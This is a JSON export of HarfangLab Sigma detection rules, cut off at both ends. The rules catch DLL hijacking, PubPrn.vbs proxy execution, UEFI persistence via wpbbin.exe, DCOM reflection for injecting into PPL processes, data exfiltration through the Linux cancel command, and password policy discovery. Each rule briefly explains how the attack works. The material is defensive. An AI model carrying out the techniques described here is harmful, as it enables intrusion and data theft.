"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec366893-fa2d-48de-bf9b-e5f2c7e4077b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081888Z",
"creation_date": "2026-03-23T11:45:34.081890Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081894Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cofir.yml",
"content": "title: DLL Hijacking via cofir.exe\nid: ec366893-fa2d-48de-bf9b-e5f2c7e4077b\ndescription: |\n Detects potential Windows DLL Hijacking via cofir.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cofire.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\version.dll'\n - '\\wdi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec366893-fa2d-48de-bf9b-e5f2c7e4077b",
"rule_name": "DLL Hijacking via cofir.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cofir.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ec741c91-d0ea-4b80-9b52-5cf7d569769a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.591822Z",
"creation_date": "2026-03-23T11:45:34.591826Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.591833Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_mpcmdrun.yml",
"content": "title: DLL Hijacking via MpCmdRun.exe\nid: ec741c91-d0ea-4b80-9b52-5cf7d569769a\ndescription: |\n Detects potential Windows DLL Hijacking via MpCmdRun.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers can use the legitimate and signed MpCmdRun.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://www.bleepingcomputer.com/news/security/lockbit-ransomware-abuses-windows-defender-to-load-cobalt-strike/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/08/01\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MpCmdRun.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith: '\\mpclient.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n\n exclusion_legitimate_dll:\n sha256:\n - '30986d2796f29d3e734be1012c8eca44f57abadd1b33d12adfb18a5eaea6b632'\n - 'fa1125bd8cdbb13c6ced323a737672ddc5c2b396210035d6e524e86a77272c07'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ec741c91-d0ea-4b80-9b52-5cf7d569769a",
"rule_name": "DLL Hijacking via MpCmdRun.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MpCmdRun.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers can use the legitimate and signed MpCmdRun.exe to load a malicious DLL named mpclient.dll and planted in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-08-01",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed39c261-6c1f-4562-a747-46a7be695c9f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071384Z",
"creation_date": "2026-03-23T11:45:34.071386Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071390Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Pubprn/",
"https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268",
"https://attack.mitre.org/techniques/T1216/001/"
],
"name": "t1216_001_pubprn_proxy_execution.yml",
"content": "title: PubPrn.vbs Proxy Execution\nid: ed39c261-6c1f-4562-a747-46a7be695c9f\ndescription: |\n Detects the execution of the Windows PubPrn.vbs script with suspicious arguments.\n PubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe.\n Adversaries may use PubPrn to proxy execution of malicious remote files, to try and evade detection.\n It is recommended to analyze the script pointed to by the commmandline, as well as the execution context of the program running the PubPrn script.\nreferences:\n - https://lolbas-project.github.io/lolbas/Scripts/Pubprn/\n - https://github.com/op7ic/EDR-Testing-Script/blob/master/runtests.bat#L268\n - https://attack.mitre.org/techniques/T1216/001/\ndate: 2025/10/10\nmodified: 2025/10/29\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.PubPrn\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine|contains|all:\n - '\\pubprn.vbs'\n - 'script:'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed39c261-6c1f-4562-a747-46a7be695c9f",
"rule_name": "PubPrn.vbs Proxy Execution",
"rule_description": "Detects the execution of the Windows PubPrn.vbs script with suspicious arguments.\nPubPrn.vbs is a Visual Basic script that publishes a printer to Active Directory Domain Services. The script may be signed by Microsoft and is commonly executed through the Windows Command Shell via Cscript.exe.\nAdversaries may use PubPrn to proxy execution of malicious remote files, to try and evade detection.\nIt is recommended to analyze the script pointed to by the commmandline, as well as the execution context of the program running the PubPrn script.\n",
"rule_creation_date": "2025-10-10",
"rule_modified_date": "2025-10-29",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed5d6af8-fae2-413c-8d87-95346a6aa412",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077711Z",
"creation_date": "2026-03-23T11:45:34.077713Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077717Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://persistence-info.github.io/Data/wpbbin.html",
"https://attack.mitre.org/techniques/T1542/001/"
],
"name": "t1542_001_possible_uefi_persistance_with_wpbbin.yml",
"content": "title: Possible UEFI Persistence via wppbin.exe Detected\nid: ed5d6af8-fae2-413c-8d87-95346a6aa412\ndescription: |\n Detects the creation of wpbbin.exe executable file in the System32 folder, which can be indicative of UEFI persistence.\n wpbbin.exe is file placed by the BIOS in System32 and is executed by smss.exe during OS startup.\n Malicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\n It is recommended to investigate the wpbbin.exe binary to determine its legitimacy as well as to look for other suspicious behavior associated with this process.\nreferences:\n - https://persistence-info.github.io/Data/wpbbin.html\n - https://attack.mitre.org/techniques/T1542/001/\ndate: 2022/07/20\nmodified: 2025/02/17\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1542.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path: '?:\\Windows\\System32\\wpbbin.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed5d6af8-fae2-413c-8d87-95346a6aa412",
"rule_name": "Possible UEFI Persistence via wppbin.exe Detected",
"rule_description": "Detects the creation of wpbbin.exe executable file in the System32 folder, which can be indicative of UEFI persistence.\nwpbbin.exe is file placed by the BIOS in System32 and is executed by smss.exe during OS startup.\nMalicious actors can use this feature as a persistence mechanism by putting a malicious wpbbin.exe that will be executed at the next startup.\nIt is recommended to investigate the wpbbin.exe binary to determine its legitimacy as well as to look for other suspicious behavior associated with this process.\n",
"rule_creation_date": "2022-07-20",
"rule_modified_date": "2025-02-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1542.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed5f37fa-eb11-49c8-b955-c916c6bb9c47",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621901Z",
"creation_date": "2026-03-23T11:45:34.621903Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621907Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html",
"https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_dotnet_dcomreflection_enabled_via_registry.yml",
"content": "title: .NET DCOM Reflection Enabled via Registry\nid: ed5f37fa-eb11-49c8-b955-c916c6bb9c47\ndescription: |\n Detects DCOM reflection enabled using the Registry.\n James Forshaw from Google Project Zero discovered a vulnerability in how certain COM servers, particularly those implementing the IDispatch interface, allow the creation of arbitrary objects within the process.\n By manipulating registry keys to enable DCOM reflection and redirect COM activation, the system is tricked into treating a legacy COM class (StdFont) as a .NET System.Object, effectively bridging the native and managed worlds.\n This can be used in order to inject arbitrary .NET code into Protected Process Light (PPL) processes.\n It is recommended to investigate the process that set this registry value and its process tree.\nreferences:\n - https://googleprojectzero.blogspot.com/2025/01/windows-bug-class-accessing-trapped-com.html\n - https://mohamed-fakroud.gitbook.io/red-teamings-dojo/abusing-idispatch-for-trapped-com-object-access-and-injecting-into-ppl-processes\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/03/03\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\AllowDCOMReflection'\n Details: 'DWORD (0x00000001)'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed5f37fa-eb11-49c8-b955-c916c6bb9c47",
"rule_name": ".NET DCOM Reflection Enabled via Registry",
"rule_description": "Detects DCOM reflection enabled using the Registry.\nJames Forshaw from Google Project Zero discovered a vulnerability in how certain COM servers, particularly those implementing the IDispatch interface, allow the creation of arbitrary objects within the process.\nBy manipulating registry keys to enable DCOM reflection and redirect COM activation, the system is tricked into treating a legacy COM class (StdFont) as a .NET System.Object, effectively bridging the native and managed worlds.\nThis can be used in order to inject arbitrary .NET code into Protected Process Light (PPL) processes.\nIt is recommended to investigate the process that set this registry value and its process tree.\n",
"rule_creation_date": "2025-03-03",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "ed648faa-53a0-4b80-970f-0d08b4d025ca",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087592Z",
"creation_date": "2026-03-23T11:45:34.087594Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087601Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://gtfobins.github.io/gtfobins/cancel/",
"https://attack.mitre.org/techniques/T1048/"
],
"name": "t1048_cancel_exfilt_lolbin.yml",
"content": "title: Possible Data Exfiltration via Cancel\nid: ed648faa-53a0-4b80-970f-0d08b4d025ca\ndescription: |\n Detects an attempt to send a file through the network using the cancel command.\n Cancel is a Linux command that is used to cancel print jobs by sending an HTTP request with a custom user.\n Attackers can exploit this by using this HTTP request and replacing the user with the data they want to exfiltrate.\n It is recommended to verify if the address specified in the request is a legitimate print job handler.\nreferences:\n - https://gtfobins.github.io/gtfobins/cancel/\n - https://attack.mitre.org/techniques/T1048/\ndate: 2023/06/29\nmodified: 2025/02/18\nauthor: HarfangLab\ntags:\n - attack.exfiltration\n - attack.t1048\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Cancel\n - classification.Linux.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_image:\n ProcessImage|endswith: '/cancel'\n CommandLine|contains: ' -u '\n\n selection_host:\n CommandLine|contains:\n - ' -h *:??'\n - ' -h *:???'\n - ' -h *:????'\n - ' -h *:?????'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "ed648faa-53a0-4b80-970f-0d08b4d025ca",
"rule_name": "Possible Data Exfiltration via Cancel",
"rule_description": "Detects an attempt to send a file through the network using the cancel command.\nCancel is a Linux command that is used to cancel print jobs by sending an HTTP request with a custom user.\nAttackers can exploit this by using this HTTP request and replacing the user with the data they want to exfiltrate.\nIt is recommended to verify if the address specified in the request is a legitimate print job handler.\n",
"rule_creation_date": "2023-06-29",
"rule_modified_date": "2025-02-18",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1048"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "eda4c668-8c9e-41ea-801f-e3bd359382b4",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.605654Z",
"creation_date": "2026-03-23T11:45:34.605658Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.605665Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1201/"
],
"name": "t1201_net_accounts.yml",
"content": "title: Password Policy Discovered via net accounts\nid: eda4c668-8c9e-41ea-801f-e3bd359382b4\ndescription: |\n Detects the execution of net.exe to discover the local accounts configuration, including password policy configuration.\n This activity may indicate a potential security threat or malicious behavior.\n It is recommended to investigate the parent processes for other suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1201/\ndate: 2022/12/02\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1201\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n - OriginalFileName: 'net1.exe'\n\n selection_cmd:\n CommandLine|contains: ' accounts'\n # Filter-out missing parents\n ParentImage|contains: '?'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '|?:\\Windows\\System32\\wsmprovhost.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-?\\PDQInventory-Scanner-?.exe'\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\Program Files (x86)\\wapt\\waptpython.exe'\n - '?:\\Program Files (x86)\\wapt\\waptservice.exe'\n - '?:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe'\n - '?:\\Program Files\\pandora_agent\\util\\pandora_hardening.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n exclusion_defender:\n GrandparentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentCommandLine|contains|all:\n - ' -Command & {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('\n - '[System.IO.FileMode]::Open, [System.IO.FileAccess]::Read'\n - '::Read);$calculatedHash = Get-FileHash'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\DataCollection\\'\n\n exclusion_defender_no_parent:\n CurrentDirectory:\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads'\n - '?:\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection\\Downloads\\'\n IntegrityLevel: 'System'\n\n exclusion_wazuh:\n GrandparentImage: '?:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "eda4c668-8c9e-41ea-801f-e3bd359382b4",
"rule_name": "Password Policy Discovered via net accounts",
"rule_description": "Detects the execution of net.exe to discover the local accounts configuration, including password policy configuration.\nThis activity may indicate a potential security threat or malicious behavior.\nIt is recommended to investigate the parent processes for other suspicious activities.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1201"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "edbcd2f2-a49b-47c3-818f-df7d306a6041",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077292Z",
"creation_date": "2026-03-23T11:45:34.077294Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_deploymentcsphelper.yml",
"content": "title: DLL Hijacking via deploymentcsphelper.exe\nid: edbcd2f2-a49b-47c3-818f-df7d306a6041\ndescription: |\n Detects potential Windows DLL Hijacking via deploymentcsphelper.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: 